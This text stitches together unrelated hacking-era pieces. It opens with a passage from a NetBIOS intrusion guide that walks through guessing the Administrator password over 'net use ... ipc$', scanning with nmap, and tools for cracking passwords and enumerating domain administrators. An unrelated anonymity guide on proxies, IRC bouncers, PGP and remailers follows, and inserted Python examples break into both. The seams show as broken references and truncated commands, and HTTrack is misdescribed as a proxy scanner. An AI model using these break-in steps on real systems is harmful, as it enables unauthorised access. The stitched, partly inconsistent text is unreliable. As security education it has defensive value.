On the other shoulder a little devil is sneering, "Show the luser no mercy. Information should be free. Because I said so, that's why. Hot darn, are those spreadsheets from the accounting department? You could make a lot of bucks selling those files to a competitor, muhahaha! Besides, you're so ugly that future cellmate Spike won't make you be his girlfriend."
Some hackers might think that because ftproot is shared to the world that it is OK to download stuff from it. However, if someone were to log in properly to that ftp server, he or she would get the message "Welcome to Oldguy on Carolyn Meinel's LAN. Use is restricted to only those for whom Meinel has assigned a user name and password." This warning logon banner is all a computer owner needs to legally establish that no one is allowed to just break in. It won't impress a judge if a cracker says "The owner was so lame that her computer deserved to get broken into" or "I'm so lame that I forgot to try to use the ftp server the normal way."
More on the Net Commands
Let's get back to the net commands. There are many forms of this command. In XP you can learn about them with the command:
C:\>net help
The syntax of this command is:
NET HELP command
-or-
NET command /HELP
Commands available are:
• NET ACCOUNTS
• NET HELP
• NET SHARE
• NET COMPUTER
• NET HELPMSG
• NET START
• NET CONFIG
• NET LOCALGROUP
• NET STATISTICS
• NET CONFIG SERVER
• NET NAME
• NET STOP
• NET CONFIG WORKSTATION
• NET PAUSE
• NET TIME
• NET CONTINUE
• NET PRINT
• NET USE
• NET FILE
• NET SEND
• NET USER
• NET GROUP
• NET SESSION
• NET VIEW
• NET HELP SERVICES lists some of the services you can start.
• NET HELP SYNTAX explains how to read NET HELP syntax lines.
• NET HELP command | MORE displays Help one screen at a time.
How Crackers Break in as Administrator
As we look around Oldguy further, we see that there's not much else an anonymous user can do to it. We know that there is a user named Administrator. What can we do if we can convince Oldguy that we are Administrator?
******************
Newbie note: in Windows NT, 2000 and XP, the Administrator user has total power over its computer, just as root has total power over a Unix/Linux type computer. However, it is possible to change the name of Administrator so an attacker has to guess which user has all the power.
******************
Let's try to log in as Administrator by guessing the password. Give the command:
C:\>net use \\10.0.0.2\ipc$ * /user:Administrator
Type the password for \\10.0.0.2\ipc$:
System error 1219 has occurred.
Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
This means that someone else is currently logged onto this server who has Administrator rights. Furthermore, this person is probably watching me on an IDS and thinking up terrible things to do to me. Eeep! Actually this is all going on inside my hacker lab - but you get the idea of what it could be like when trying to invade a computer without permission.
I discover that whether I guess the password correctly or not, I always get the same error message. This is a good safety feature. On the other hand, one of the users is named Administrator. This is a bad thing for the defender. When you first set up a Windows NT or 2000 server, there is always a user called Administrator, and he or she has total power over that computer. If you know the all-powerful user is named Administrator, you can try guessing the password whenever no one is logged on with Administrator powers.
Computer criminals don't waste time guessing by hand. They use a program such as NAT or Legion to get passwords. These programs are why smart NT administrators rename their Administrator accounts and choose hard passwords. Also, this kind of persistent attack will be detected by an intrusion detection system, making it easy to catch criminals at work.
********************
You can get expelled warning: What if you are a student and you want to save your school from malicious code kiddies who steal tests and change grades? It is important to get permission *in writing* before you test the school's network. Even then, you still must be careful to be a model student. If you act up, cut classes - you know what I mean - the first time a cracker messes up the network, who do you think they will suspect? Yes, it's unfair, and yes, that is the way the world works.
********************
How to Scan for Computers that Use NetBIOS
Your tool of choice is a port scanner. Any computer that is running something on port 139 is likely (but not certain) to be using NetBIOS. Most crackers use nmap to port scan. This tool runs on Unix/Linux type computers. You can get it at
Here's an example of an nmap scan of Oldguy:
test-box:/home/cmeinel # nmap -sTU 10.0.0.2
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (10.0.0.2):
(The 3060 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
70/tcp open gopher
80/tcp open http
135/tcp open loc-srv
135/udp open loc-srv
137/udp open netbios-ns
138/udp open netbios-dgm
139/tcp open netbios-ssn
500/udp open isakmp
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
As you can see from this scan, three ports are identified with NetBIOS. This tells us that we could set nmap to scan a large number of Internet addresses, only looking for port 139 on each. To learn how to set up nmap to run this way, in your Unix or Linux shell give the command "man nmap".
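The scan above is the kind of report an administrator reads when checking their own LAN for machines that answer on the NetBIOS ports. As an added example (not part of the guide), this parses nmap's classic plain-text output, the format shown above, and lists per host which open ports belong to the NetBIOS/SMB family; the second host and its hostname in the sample are constructed.

```python
"""Inventory helper for nmap's classic plain-text report.

Added example, not part of the original guide: parse the report and list,
per host, the open ports that belong to the NetBIOS/SMB family, so that a
scan of a network you administer turns into a checklist.
"""
import re

# Services the guide's scan showed on 137/udp, 138/udp and 139/tcp, plus
# 445/tcp (direct-hosted SMB), the port the firewall message above blocked.
NETBIOS_PORTS = {
    (137, "udp"): "netbios-ns",
    (138, "udp"): "netbios-dgm",
    (139, "tcp"): "netbios-ssn",
    (445, "tcp"): "microsoft-ds",
}

# Matches "Interesting ports on (10.0.0.2):" and "Interesting ports on name (10.0.0.2):"
HOST_RE = re.compile(r"^Interesting ports on (?:\S+ )?\((\d{1,3}(?:\.\d{1,3}){3})\):")
# Matches lines such as "139/tcp open netbios-ssn"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap(report):
    """Return {ip: {(port, proto): (state, service)}} from nmap's plain output."""
    hosts, current = {}, None
    for raw in report.splitlines():
        line = raw.strip()
        host = HOST_RE.match(line)
        if host:
            current = host.group(1)
            hosts[current] = {}
            continue
        port = PORT_RE.match(line)
        if port and current is not None:
            number, proto, state, service = port.groups()
            hosts[current][(int(number), proto)] = (state, service)
    return hosts


def netbios_exposure(hosts):
    """Map each host to its open NetBIOS/SMB ports, e.g. ['137/udp', '139/tcp']."""
    exposure = {}
    for ip, ports in hosts.items():
        open_nb = sorted(
            key for key, (state, _service) in ports.items()
            if state == "open" and key in NETBIOS_PORTS
        )
        exposure[ip] = [f"{port}/{proto}" for port, proto in open_nb]
    return exposure


# Constructed sample: the guide's Oldguy scan plus a made-up second host
# ("webbox", 10.0.0.3) that only runs a web server and filters 139/tcp.
SAMPLE_REPORT = """\
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (10.0.0.2):
(The 3060 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
70/tcp open gopher
80/tcp open http
135/tcp open loc-srv
135/udp open loc-srv
137/udp open netbios-ns
138/udp open netbios-dgm
139/tcp open netbios-ssn
500/udp open isakmp
Interesting ports on webbox (10.0.0.3):
Port State Service
80/tcp open http
139/tcp filtered netbios-ssn
Nmap run completed -- 2 IP addresses (2 hosts up) scanned in 9 seconds
"""

if __name__ == "__main__":
    for ip, ports in netbios_exposure(parse_nmap(SAMPLE_REPORT)).items():
        print(ip, "exposes", ", ".join(ports) or "no NetBIOS ports")
```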
For more on what crackers do once they break into a computer using NetBIOS (like installing back doors), see http://happyhacker.org/gtmhh/vol3no10.shtml
********************
You can get punched in the nose warning: if you use a port scanner against networks that haven't given you permission to scan, you will be waving a red flag that says "Whaddaya wanna bet I'm a computer criminal?" You can't get arrested for merely port scanning, but people who don't like being scanned might get you kicked off your Internet service provider.
You can get really, big time, punched in the nose warning: If you visit the same computer or LAN really often to see what's new and to try different things, even if you don't break the law you'd better be doing it with the permission of the owner. Otherwise you may make enemies who might crash or destroy your operating system. And that is only what they may do when feeling mellow. After a night of hard drinking - well, you don't want to find out.
********************
How to Play NetBIOS Wargames
What if you want to challenge your friends to a hacker wargame using NetBIOS? The first thing to do is *don't* email me asking me to break in for you. Sheesh. Seriously, almost every day I get emails from people claiming to have permission from their girlfriend/boyfriend and begging me to help them break in. You can read their hilarious pleas for help at http://happyhacker.org/sucks/ .
The way to run a hacker wargame over the Internet is first, get permission from your Internet provider so they don't kick you off for hacking. They probably run an IDS that scans users for suspicious activity. They probably hate malicious hackers. Enough said.
Second, you and your friends are likely to be at a different Internet address every time you log on. Your safest way to play over the Internet is for each player to get an Internet address that is the same every time he or she logs on: a "static" address. This way you won't accidentally break into someone else's computer.
You have to arrange with your Internet provider to get a static address. Normally only a local provider can do this for you. A big advantage of using a local provider is you can make friends with the people who work there - and they are probably hackers.
If you live in an apartment building or dormitory with other hackers, you can play break-in games without using the Internet. Set up a LAN where you can play together. For example, you can string Ethernet cable from window to window. To learn how to set up a Windows Ethernet LAN, see http://happyhacker.org/gtmhh/winlan.shtml .
Or you could set up a wireless LAN. With wireless you never know who might come cruising with a laptop down the street by your home or business and break in. That can make a wargame lots more fun. For help on how to break into wireless LANs (it's pathetically easy), see
**************
Evil genius tip: Attack using a Win NT server with the Microsoft Resource Kit installed. Heh, heh. With it you can give the command:
C:\>Local Administrators \\
This should show all user accounts with administrator rights on targetbox.com.
C:\>Global Administrators \\
This should show all user accounts with Domain administrative rights. These are exceptionally worth compromising, because with one Domain administrative password you will be able to control many resources among NT servers, workstations, and Win 95/98 computers.
I've tried to install the Resource Kit on XP Professional, but it wasn't compatible.
Another option is to install hacker tools such as Red Button and DumpACL, which extract information on user names, hashes, and which services are running on a given machine.
**************
Help for users of Windows 95, 98, SE or ME
To enable NetBIOS, click
Control Panel -> Network -> Protocols
If you see both NetBEUI and TCP/IP, you are already using NetBIOS. If not, add NetBEUI.
To bring up the command screen, click Start -> Run and type in command.com.
Anonymity Complete GUIDE By Theraider & Dangerous R.
Anonymity on the web
[ t a b l e o f c o n t e n t s ]
01 - table of contents
02 - introduction
03 - first tips
04 - about proxies
05 - cookies
06 - ftp transfers
07 - secure transactions
08 - SSL tunnelling
09 - anonymity on irc
10 - mail crypto (and pgp usage)
11 - icq privacy
12 - spyware
13 - cleaning tracks
14 - ending words
[ introduction ]
Nowadays, everyone wants privacy on the web, because no matter where you go, someone could be watching you. Someone like your employer, someone trying to hack your system, companies gathering all your info to sell to yet other companies, or even the government, may be on your track while you peacefully surf the web. Thus, anonymity on the web means being able to use all of its services with no concern about someone snooping on your data.
Your computer, being connected to the net, has an IP [Internet Protocol] address. If you have a dial-up connection, then your IP changes every time you connect to the internet (this is not always true, though; there are dial-up ISPs, especially for university students, that do have static IPs). Cable modems and DSL connections have a static IP, which means that the IP address does not change. One of the goals of getting anonymous is to make sure your IP (either static or dynamic) isn't revealed to other users of the internet, or to the administrators of the servers you roam around when using internet services.
This text tries to give you some hints on how to maintain your anonymity on the web. Some of the hints may sound banal, but think about whether you really abide by them in every situation.
[ first tips ]
When chatting on IRC, ICQ, AIM (etc..), do not give out personal information about yourself, where you live, work, etc.
Do not use your primary email address (the one your ISP gave you) anywhere except with family members, close friends or trusted people. Instead create for yourself a web-based email account such as yahoo, hotmail, dynamitemail, mail.com, etc. and use this e-mail address for signing up for services, when you need to give an address to download something, or to publish on your homepage.
When signing up for services on the web, don't give your real information like address, phone number and such unless you really need to do so. This is the kind of information that information gathering companies like to get, so that they can sell it and fill your mailbox with spam.
Use an anonymous proxy to surf the web. This makes sure your IP doesn't get stored in the web server logs. (Web servers log every GET request made, together with date, hour, and IP. This is where the proxy comes in: they get the IP of the proxy, not yours.)
Use a bouncer to connect to IRC networks, in case you don't trust the administrators, or the other users. A bouncer is a program that sits on a permanently connected machine that allows you to connect there, and from there to the irc server, just like a proxy works for webservers.
Use anonymous remailers to send out your e-mails.
Cryptography can also help you by making sure the material you send out on the web, like by email, etc., is encrypted, not allowing anyone that doesn't have your key to read it (in key-based cryptography). Programs like PGP (Pretty Good Privacy) are toolkits with all you need to encrypt and decrypt your stuff.
Delete traces of your work with the computer including history files, cache or backup files.
[ about proxies ]
Proxies are caches that relay data. When you configure your web browser to use a proxy, it never connects to the URL. Instead it always connects to the proxy server, and asks it to get the URL for you. It works similarly with other types of services such as IRC, ICQ etc. There won't be a direct connection between you and the server, so your real IP address won't be revealed to the server. When you view a website on the server, the server won't see your IP. Some web proxies do not support forwarding of cookies, which some websites (for example Hotmail) require.
Here are some anonymous proxies that you can use to surf anonymously (notice that some of these may be a paid service):
Aixs - http://aixs.net/
Rewebber - http://www.anon.de/
Anonymizer - http://www.anonymizer.com/
The Cloak - http://www.the-cloak.com/
You will very probably find many websites that provide lists of unauthorised proxies and remailers. Such lists are usually compiled with the help of port scanners or exploit scanners, scanning for computers with WinGate or other proxies' backdoors. Using these proxies is illegal, and is considered unauthorized access to a computer. If you get such a list in your hands, check whether the information is legitimate or was compiled by a script kiddie, and act accordingly.
If you decide not to use a proxy anyway, at least do not forget to remove your personal information from your browser. After you remove details like your name and e-mail address from your browser, the only info a Web site can sniff out is your ISP's address and geographical location. Also, Java and JavaScript applets can take control of your browser unexpectedly, and if you are surfing to unknown and potentially dangerous places you should be aware of that. There are exploitable browser bugs (mainly Internet Explorer ones) reported every week.
[ cookies ]
Maybe you're not aware of the fact that if you have the "allow cookies" feature in your browser on, websites can store all sorts of information on your hard drive. Cookies are small files that contain various kinds of information that can be read by websites when you visit them. The usual usage is to track demographics for advertising agencies that want to see just what kinds of consumers a certain site is attracting. Web sites also use cookies to keep your account information up-to-date. Then, for instance, when you visit your web-based e-mail account some hours later without having logged out, you find yourself still logged on, even if you turned off your computer in between. Your login and password were simply stored on your hard drive in a cookie file. This is a security threat if more than one person has access to your computer.
Most browsers offer the possibility to turn off cookies, but some sites like Hotmail.com require them to be turned on. In case you decide to allow cookies, at least never forget to log off from websites when you finish visiting them.
[ ftp transfers ]
When using an FTP client program to download files, make sure that it is giving a bogus password, like guest@unknown.com, not your real one. If your browser lets you, turn off the feature that sends your e-mail address as a password for anonymous FTP sessions.
[ secure transaction ]
Everything being sent from the web server to your browser is usually in plain text format. That means all transferred information can be easily sniffed on the route. Some web servers support SSL (which stands for Secure Socket Layer). To view and use these websites you'll need SSL support in your browser as well. You can recognize that the connection is encrypted when the URL starts with https:// instead of the usual http://. Never use a web server without SSL for sending or receiving sensitive private or business information (credit card numbers, passwords etc.)
[ SSL tunnelling ]
What is SSL?
SSL stands for Secure Socket Layer. The "Secure" implies encryption, while Socket Layer denotes an addition to the Windows Socket system, Winsock. For those that don't know, a Socket is an attachment to a port on a system. You can have many sockets on one port, providing they are non-blocking (allowing control to pass through to another socket-aware application which wishes to connect to that port).
A Secure Socket Layer means that any sockets under it are both secure and safe. The idea behind SSL was to provide an encrypted, and thus secure, route for traffic along a socket-based system, such as TCP/IP (the internet protocol). Doing this allows security in credit card transactions on the Internet, encrypted and protected communiqués along a data line, and overall peace of mind.
SSL uses an encryption standard developed by RSA. RSA are a world-respected American organisation that specializes in encryption and data security. Initially they developed a cipher length of only 40 bits for use with the Secure Socket Layer; this was considered weak, and therefore a longer, much more complicated encryption cipher was created: 128 bits. The reasoning behind it was simple: it needs to be secure.
The RSA site puts the advantage of a longer encryption length pretty clearly: 40-bit encryption is considered to be relatively weak, and 128 bits is about 309 septillion times (309,485,000,000,000,000,000,000,000) larger than 40 bits. This would mean it would take that many times longer to crack or break 128-bit encryption than it would 40-bit.
If you want more information on the technicalities of RSA's SSL encryption engine, visit their site: http://www.rsasecurity.com/standards/ssl.
But what does all this encryption and security have to do with you?
Well, that's a simple question. No matter how hard you try, at times your privacy will need to be knowingly invaded so you can make use of the product offered for doing so. If you think about food, for example, one cannot eat without swallowing. When we wish to make a transaction or view a site on the internet, where we have to give enough information away so that it happens, we also want to be assured no one else along the line gathers that data. An encrypted session would mean our data is not in the hands of any privacy perpetrators unless they knew how to decode it, and the only ones in the know are those you specifically wish. SSL uses public key encryption as explained in the PGP section.
To put this at a head: if you use an encrypted connection or session, you can be relatively assured that there are no prying eyes along the way.
And how do I implement SSL with SSL Tunnelling?
We know that a Secure Socket Layer is safe, but what we don't know is what a Tunnel is. In its most simplistic form, a tunnel is a proxy. Like proxy voting in general elections, a tunnel will relay your data back and forth for you. You may be aware, though, that there are already "proxies" out there, and yes, that is true. Tunnelling is done via proxies, but it is not considered to be the same as standard proxy relaying, simply because it isn't.
Tunnelling is a very special kind of proxy relay, in that it can, and does, relay data without interfering. It does this transparently and without grievance or any care for what is passing its way.
Now, if we add this ability to "tunnel" data, any data, in a pipe, to the Secure Sockets Layer, we have a closed connection that is independent of the software carrying it; and something that is also encrypted. For those of you wanting to know a little more about the technicalities, the SSL layer is also classless in the sense that it does not interfere with the data passed back and forth; after all, it is encrypted and impossible to tamper with. That attribute means an SSL-capable proxy is able to transfer data out of its "proxied" connection to the destination required.
So to sum up, we have both a secure connection that does the job and relays things in the right direction, and we have a direct tunnel that doesn't care what we pass through it. Two very useful, and almost blind, entities. All we need now is a secure proxy that we can use as the tunnel.
Proxies:
Secure proxies are like standard proxies. We can either use an HTTP-based, SSL-equipped proxy (one specifically designed for securing HTTP traffic, but because of the ignorant nature of SSL communication it can be bent to any needs) or we can use a proper SSL service designed for our connection, like you would use a secure NNTP (news) program with a secure proxy on port 563 instead of taking the long way, which would probably work as well.
A secure HTTP proxy operates on port 443. Most proxies are not public, which means they operate for, and allow traffic only from, their subnet or the ISP that operates them; but there are many badly configured HTTP proxies and some public ones out there. The use of a program called HTTrack (available on Neworder) will aid you in scanning and searching for proxies on your network or anywhere on the Internet if your ISP does not provide you with one.
Neworder also features a number of sites dedicated to listing public proxies in the Anonymity section. While it's often hard to find a suitable fast proxy, it's worth the effort when you get one.
So how can I secure my connections with SSL Tunnelling?
That's a big question, and beyond the scope of this tutorial, as it must come to an end. I can, however, point you in the right direction with two resources that will aid you in tunnelling both IRC and most other connections via an HTTP proxy.
For Windows, the first stop would be Socks2HTTP from http://www.totalrc.net. This is an SSL tunnelling program that turns a normal socks proxy connection into a tunnelled SSL connection.
The second stop, for both Windows and Unix, is stunnel. Stunnel is a GNU kit developed for SSL tunnelling any connection. It is available for compiling and for download as a binary here: Stunnel homepage - http://mike.daewoo.com.pl/computer/stunnel
[ anonymity on irc ]
A BNC, or Bouncer, is used in conjunction with IRC as a way of hiding your host when people /whois you. On most IRC networks your host isn't masked when you are whois'd, meaning the entire IP appears, like 194.2.0.21, which can be resolved. On other networks your host might be masked, like IRCnetwork-0.1, but it can still give valuable information, like nationality, if your host is not an IP but a DNS-resolved host: my.host.cn would be masked to IRCnetwork-host.cn, but this would still tell the person who whois'd you that you are from China.
To keep information such as this hidden from the other users on an IRC network, many people use a Bouncer, which is actually just a Proxy. Let us first draw a schematic of how a normal connection would look, with and without a BNC installed.
Without a BNC:
your.host.cn <<-->> irc.box.sk
With a BNC:
your.host.cn <<-->> my.shell.com <<-->> irc.box.sk
You will notice the difference between the two. When you have a BNC installed, a shell functions as a link between you and the IRC server (irc.box.sk as an example). You install a BNC on a shell, and set a port for it to listen for connections on. You then log in to the shell with your IRC client, BitchX/Xchat/mIRC, and then it will log in to the IRC server you specify - irc.box.sk in this case. In effect, this changes your host, in that it is my.shell.com that makes all the requests to irc.box.sk, and irc.box.sk doesn't know of your.host.cn; it has never even made contact with it.
In that way, depending on what host your shell has, you can login to IRC with a host like i.rule.com, these vhosts are then actually just an alias for your own machine, your.host.cn, and it is all completely transparent to the IRC server.
Many servers have socks bots that check for SOCKS connections. These aren't BNC connections, and a BNC cannot be detected using a simple bot; unless your shell has a SOCKS port open (normally 1080), it will let you in with no problem at all. The shell is not acting as a proxy like you would expect, but more as a simple IRC proxy, or an IRC router. In one way, the BNC just changes the packet and sends it on, like:
to: my.shell.com    ->  to: irc.box.sk      ->  to: my.shell.com
from: your.host.cn  <-  from: my.shell.com  <-  from: irc.box.sk
The BNC simply swaps the host of your packet, saying it comes from my.shell.com. But also be aware that your own machine is perfectly aware that it has a connection established with my.shell.com, and that YOU know that you are connected to irc.box.sk.
Some BNCs are used in IRC networks to simulate one host. If you had a global IRC network, all linked together, you could have a local server called cn.myircnetwork.com which Chinese users would log into. It would then bounce them to the actual network server, in effect making all users from China have the same host - cn.myircnetwork.com, masking their hosts. Of course, you could change the host too, so it didn't reveal the nationality, but it is a nice gesture of some networks that they mask all hosts from everyone. It makes life hard for IRCops on the network, but it's a small price to pay for privacy.
Note: Even if you do use an IRC bouncer, your IP will be revealed within DCC transfers or chat, because DCC requires a direct IP-to-IP connection. A usual mistake of IRC users is to have DCC auto-reply turned on. It is then easy for an attacker to DCC chat you or offer you a file, and once the IRC clients are connected, he can find your IP address in the list of his TCP/IP connections (netstat).
How do I get an IRC bouncer?
You download and install bouncer software, or get someone to install it for you (probably the best known and best bouncer available is BNC, homepage: http://gotbnc.com/).
You configure and start the software. In case it's a bouncer on a Unix machine, you start it on your shell account (let's say shell.somewhere.com).
You open IRC and connect to the bouncer at shell.somewhere.com on the port you told it to start on.
Depending on the setup, you may have to tell it your password and tell it where to connect, and you're now on IRC as shell.somewhere.com instead of your regular hostname.
[ mail crypto ]
Usually the safest way to ensure that your e-mail won't be read by unauthorised persons is to encrypt it. To be compatible with the rest of the world I'd suggest using the free PGP software. PGP (Pretty Good Privacy) is a piece of software used to ensure that a message/file has not been changed, has not been read, and comes from the person you think it comes from. Download location: http://www.pgpi.org/
How does PGP work?
The whole idea behind PGP is that of Public and Private keys. To explain the algorithm PGP uses in order to encrypt the message would take too much time, and is beyond the scope of this; we will however look at how it ensures the integrity of the document. A user has a password; this password has to be chosen correctly, so don't choose passwords like "pop" or "iloveyou", as this will make an attack more likely to succeed. The password is used to create a private key and a public key; the algorithm ensures that you can not use the public key to make the private key. The public key is sent to a server, or to the people you send e-mails/files to, and you keep the private key secret.
We will use a few terms and people in this introduction. They are: Pk - Public Key, Sk - Secret Key (private key). Adam will send an e-mail to Eve, and Rita will be a person in between, from whom we are trying to hide the content of the mail. Rita will intercept the email (PGP doesn't ensure that Rita can't get her hands on the package; she can - it's not a secure line like other technologies) and try to read it/modify it. Adam has Sk1 and Pk1, and Eve has Sk2 and Pk2. Adam, Eve, and Rita all have Pk1 and Pk2, but Sk1 and Sk2 are presumed to be totally secret.
First, here is a schematic of how it all looks:
                    PUBLIC SERVER
                      Pk1, Pk2
Adam <------------------------------------------> Eve
Sk1                      ^                        Sk2
                         |
                         |
                         |
                         |
                        Rita
So Adam wants to send a message to Eve without Rita reading it or editing it. There are three things we need to make sure of:
That Rita can't read the text without permission
That Rita can't edit it in any way without Eve and Adam knowing
That Eve knows that Adam sent it
First thing is making sure Rita can't read the text. Adam does this by encrypting the message with Eve's Pk2, which he has found on the server. What was encrypted with a public key can only be decrypted with the matching private key, so Rita won't be able to read the data unless Eve has revealed her Sk2. (In practice PGP encrypts the body with a random one-time symmetric key and uses Pk2 only to encrypt that key, but the effect is the same.)
The second thing to make sure of is that Rita can't edit the message. Adam computes a cryptographic hash of the message and signs it with his Sk1 (see the third point); the signed hash travels with the message. When Eve gets the message she decrypts it, computes the hash herself and compares it with the one Adam signed: if they match, the message is unchanged; if not, something in it has been altered. Note that the hash alone is not enough: if it were sent unsigned, Rita could simply change the message and recompute the hash. A good hash function is collision resistant, so it is computationally infeasible to change the message and still end up with the same hash.
The third, and probably one of the most important things to ensure, is that Rita hasn't grabbed the mail, made a new one, and sent it in Adam's name. We can ensure this with the public/private key pair too. With RSA the two keys are mirror images: what one of them encrypts, only the other can decrypt. When Adam normally sends a message M to Eve he creates the ciphertext C by doing C = Pk2(M), that is, he applies Eve's Pk2 to M. Now imagine this: Adam can also apply his own Sk1 to the hash H(M). This is safe, because Sk1 cannot be derived from the result, as long as nobody knows the passphrase protecting Sk1. The result S = Sk1(H(M)) is the digital signature. Eve can undo it with Pk1, which is public: if Pk1(S) equals the hash she computes from M herself, the signature must have been made with Sk1, and since Sk1 is secret and only Adam knows it, the message is from Adam.
The entire process looks like this when sending message M. Adam hashes M and signs the hash: S = Sk1(H(M)). Then Adam encrypts the message and signature for Eve: C = Pk2(M, S). The package that travels is therefore C = Pk2(M, Sk1(H(M))). Rita can intercept C, but she cannot decrypt it, and she cannot edit it without Eve noticing. Eve receives C and decrypts it: (M, S) = Sk2(C). Then she checks the signature: Pk1(S) must equal H(M). One thing the signature does not prevent is Rita re-sending an old, unmodified C at a later time; if that matters, the message itself must carry something like a date or a sequence number so Eve can spot the replay.
This way the PGP public/private key system ensures both the confidentiality and the integrity of the e-mail. PGP is not the only software built on public/private key theory: RSA, one of the algorithms PGP itself uses, is found in many other products (Blowfish, on the other hand, is a symmetric cipher, not a public key system). PGP is simply the most popular choice for e-mail encryption, although some don't trust it because of rumours of NSA backdoors (I don't know if that is true). PGP comes in a commercial and a freeware version for Windows and is available for Linux as well. Whatever encryption you use, it will be better than none.
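To make the Adam/Eve/Rita exchange concrete, here is an added example, not part of the original text and not PGP's own code, that implements the sign-then-encrypt flow above with textbook RSA on toy 64-bit primes and SHA-256 as the hash. The key sizes, the lack of padding, the sample message text and the names adam_send/eve_receive are my assumptions for illustration; real PGP uses far larger keys, proper padding, and encrypts the body with a random session key that is itself encrypted to Pk2. The demo walks through the three cases from the text: an honest mail from Adam verifies, a ciphertext block altered by Rita is rejected, and a mail Rita writes in Adam's name fails the signature check because she can only sign with her own Sk3.

```python
import hashlib
import random

# Bases for deterministic Miller-Rabin; exact for every n below about 3.1e23,
# which covers the 64-bit prime candidates generated here.
_MR_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
CHUNK = 8        # 8-byte blocks are < 2**64, far below the ~126-bit modulus
SIG_BYTES = 16   # a signature is an integer below n, so it fits in 16 bytes


def is_prime(n):
    if n < 2:
        return False
    for a in _MR_BASES:
        if n % a == 0:
            return n == a
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for a in _MR_BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(rng, bits):
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1   # top bit set, odd
        if is_prime(cand):
            return cand


def gen_keypair(rng, bits=64):
    """Textbook RSA: Pk = (n, e), Sk = (n, d). Toy sizes, no padding (assumption)."""
    e = 65537
    while True:
        p, q = _random_prime(rng, bits), _random_prime(rng, bits)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:          # e is prime, so this means gcd(e, phi) == 1
            return (p * q, e), (p * q, pow(e, -1, phi))


def _encrypt(pk, data):
    """Pk(data): length-framed, zero-padded to CHUNK, each block raised to e mod n."""
    n, e = pk
    framed = len(data).to_bytes(4, "big") + data
    framed += b"\x00" * (-len(framed) % CHUNK)
    return [pow(int.from_bytes(framed[i:i + CHUNK], "big"), e, n)
            for i in range(0, len(framed), CHUNK)]


def _decrypt(sk, blocks):
    """Sk(blocks): inverse of _encrypt; None if a block does not decrypt to 8 bytes."""
    n, d = sk
    out = bytearray()
    for c in blocks:
        m = pow(c, d, n)
        if m >= 1 << (8 * CHUNK):       # a block Rita altered decrypts to junk
            return None
        out += m.to_bytes(CHUNK, "big")
    length = int.from_bytes(out[:4], "big")
    if length > len(out) - 4:
        return None
    return bytes(out[4:4 + length])


def _hash_mod(msg, n):
    """H(M) reduced into the signer's modulus (toy; real schemes pad instead)."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % n


def adam_send(msg, sk_adam, pk_eve):
    """S = Sk1(H(M)); C = Pk2(M, S). Sign first, then encrypt for Eve."""
    n1, d1 = sk_adam
    sig = pow(_hash_mod(msg, n1), d1, n1)
    return _encrypt(pk_eve, msg + sig.to_bytes(SIG_BYTES, "big"))


def eve_receive(blocks, sk_eve, pk_adam):
    """(M, S) = Sk2(C); accept only if Pk1(S) == H(M). Returns (ok, msg)."""
    plain = _decrypt(sk_eve, blocks)
    if plain is None or len(plain) < SIG_BYTES:
        return False, None
    msg, sig = plain[:-SIG_BYTES], int.from_bytes(plain[-SIG_BYTES:], "big")
    n1, e1 = pk_adam
    return pow(sig, e1, n1) == _hash_mod(msg, n1), msg


def demo():
    rng = random.Random(2001)                # fixed seed: reproducible toy keys
    pk1, sk1 = gen_keypair(rng)              # Adam
    pk2, sk2 = gen_keypair(rng)              # Eve
    _pk3, sk3 = gen_keypair(rng)             # Rita
    msg = b"Meet at the usual place at nine."    # constructed sample mail
    honest = eve_receive(adam_send(msg, sk1, pk2), sk2, pk1)
    tampered = adam_send(msg, sk1, pk2)
    tampered[1] ^= 1                         # Rita flips a bit of the ciphertext
    tamper = eve_receive(tampered, sk2, pk1)
    # Rita writes her own mail to Eve "from Adam"; she can only sign with her Sk3
    forged = eve_receive(adam_send(b"Send the money to Rita.", sk3, pk2), sk2, pk1)
    return honest, tamper, forged
```

demo() returns (True, the message) for the honest mail and False for both of Rita's attempts; the forged mail still decrypts cleanly, which is exactly why the signature check, not the decryption, is what tells Eve who wrote it.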
[ anonymous remailers ]
Remailers are programs accessible on the Internet that route email and USENET postings anonymously (i.e., the recipient cannot determine who sent the email or posted the article). This way the sender can't be traced back by routing headers included in the e-mail. There are different classes of remailers, which allow anonymous exchange of email and anonymous posting to USENET and often many other useful features.
Resources:
Chain is a menu-driven remailer-chaining script:
http://www.obscura.com/crypto.html
Raph Levien's remailer availability page offers comprehensive information about the subject
http://www.sendfakemail.com/~raph/remailer-list.html
The Cypherpunks remailers are being developed to provide a secure means of anonymity on the nets. Here you can find out about the available remailers, those which have been standard and in existence for a long time as well as the new experimental remailers and anonymous servers.
http://www.csua.berkeley.edu/cypherpunks/remailer/
[ icq privacy ]
How can I keep my privacy on ICQ?
Send and receive messages via the ICQ server, not directly. Every direct connection lets the other party, or an attacker, learn your IP. Encrypt your messages with dedicated software or encryption add-ons.
How do I encrypt ICQ messages?
There are add-ons which give your ICQ the ability to encrypt outgoing messages. The user on the other side needs to have the add-on as well in order to decrypt your message.
Resources:
http://www.encrsoft.com/products/tsm.html
Top Secret Messenger (TSM) - trial version has only weak 8-bit encryption
http://www.planet-express.com/sven/technical/dev/chatbuddy/default.html
Chat Buddy - a freeware Windows application for encrypting chat sessions
http://www.algonet.se/~henisak/icq/encrypt-v5.txt
how encryption works in ICQ protocol v5
[ spyware ]
As we all work hard to become more savvy about protecting our personal information and staying as anonymous as possible on the web, advertising companies are working just as hard to come up with new ways of getting our personal information. One of the ways they accomplish this is through spyware.
